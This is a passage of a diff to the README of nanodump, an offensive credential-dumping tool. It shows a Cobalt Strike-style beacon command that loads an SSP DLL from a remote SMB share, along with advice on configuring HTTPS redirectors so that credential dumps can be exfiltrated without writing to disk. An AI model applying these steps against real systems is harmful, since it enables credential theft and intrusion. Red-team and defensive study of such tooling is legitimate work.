fortra/nanodump/README.md

 beacon> load_ssp \\10.10.10.10\openShare\nanodump_ssp.x64.dll
 ```

-## HTTPS redirectors
+<h2 id="redirectors">10.
+HTTPS redirectors</h2>

-If you are using an HTTPS redirector (as you should), you might run into issues due to the size of the requests that leak the dump.
+If you are using an HTTPS redirector (as you should), you might run into issues when downloading the dump filessly due to the size of the requests that leak the dump.
 Increase the max size of requests on your web server to allow nanodump to download the dump.

 #### NGINX